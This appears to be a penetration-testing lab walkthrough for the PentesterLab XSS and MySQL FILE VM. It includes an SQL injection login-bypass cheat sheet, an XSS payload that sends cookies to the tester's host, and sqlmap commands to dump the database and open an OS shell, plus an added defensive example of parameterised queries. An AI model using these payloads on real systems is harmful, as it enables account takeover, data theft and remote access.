
    OSCP Security Technology - SQL Injection(SQLi)

    Installing XSS & MySQL FILE

    https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

    Exploit this VM

    Find the IP address (192.168.2.41) of the XSS_MySQL_File virtual machine.

    netdiscover
    

    Browse the PentesterLab vulnerable blog in Firefox.

    Click the Admin button.

    Refer to the SQL Injection Authentication Bypass Cheat Sheet:

    https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

    or 1=1
    or 1=1--
    or 1=1#
    or 1=1/*
    admin' --
    admin' #
    admin'/*
    admin' or '1'='1
    admin' or '1'='1'--
    admin' or '1'='1'#
    admin' or '1'='1'/*
    admin'or 1=1 or ''='
    admin' or 1=1
    admin' or 1=1--
    admin' or 1=1#
    admin' or 1=1/*
    admin') or ('1'='1
    admin') or ('1'='1'--
    admin') or ('1'='1'#
    admin') or ('1'='1'/*
    admin') or '1'='1
    admin') or '1'='1'--
    admin') or '1'='1'#
    admin') or '1'='1'/*
    1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    admin" --
    admin" #
    admin"/*
    admin" or "1"="1
    admin" or "1"="1"--
    admin" or "1"="1"#
    admin" or "1"="1"/*
    admin"or 1=1 or ""="
    admin" or 1=1
    admin" or 1=1--
    admin" or 1=1#
    admin" or 1=1/*
    admin") or ("1"="1
    admin") or ("1"="1"--
    admin") or ("1"="1"#
    admin") or ("1"="1"/*
    admin") or "1"="1
    admin") or "1"="1"--
    admin") or "1"="1"#
    admin") or "1"="1"/*
    1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
    

    Try the login bypass strings one by one.
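To show why the bypass strings above work and what stops them, here is an added example (not code from the original post or from PentesterLab): a string-built login query beside a parameterised one, fed a few of the page's own payloads. It assumes a users table with plain username and password columns and uses an in-memory SQLite database in place of MySQL, so only the `'` and `--` payload forms are exercised (`#` and `/*` comments are MySQL-specific).

```python
import sqlite3

# Constructed stand-in for the blog's MySQL backend (assumed schema: a users table
# with plain username/password columns; the post does not show the real one).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'P4ssw0rd')")
    db.commit()
    return db

def login_vulnerable(db, username, password):
    # String concatenation: a quote in the input closes the literal and the
    # rest of the input is parsed as SQL. "admin' or '1'='1" becomes
    #   ... WHERE username = 'admin' or '1'='1' AND password = '...'
    # which is true for the admin row whatever the password is.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL: the payload broke the query instead of bypassing it
    return row[0] if row else None

def login_safe(db, username, password):
    # Parameterised query: the values never enter the SQL text, so the same payload
    # is compared as a literal string and matches no user.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# A few bypass strings from the cheat sheet above, tried against both versions.
PAYLOADS = ["admin' --", "admin' or '1'='1", "admin' or 1=1--"]

def compare(payloads=PAYLOADS, password="wrong"):
    """Return {payload: (user returned by vulnerable login, user returned by safe login)}."""
    db = make_db()
    return {p: (login_vulnerable(db, p, password), login_safe(db, p, password))
            for p in payloads}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r:22} vulnerable={vuln!r:8} safe={safe!r}")
```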

    Another method: get the cookie.

    php -S 192.168.2.26:80
    

    Submit a new query.

    <script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>
    

    Then we can find the PHPSESSID in the web server log on our side.

    Modify the value of the cookie to the latest one.

    Then we can visit the admin portal without a username and password.

    Modify the URL to look for more vulnerabilities.

    The GET parameter 'id' is injectable.

    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1
    

    Dump the database tables and crack the password 'P4ssw0rd' for the user 'admin'.

    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1 --dump
    

    Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    
    sqlmap -u "http://192.168.2.41/admin/edit.php?id=1" --cookie=PHPSESSID=rp2a6klerscqkpedns1s4rnbo1 --os-shell
    

    Original post: https://www.cnblogs.com/keepmoving1113/p/15141418.html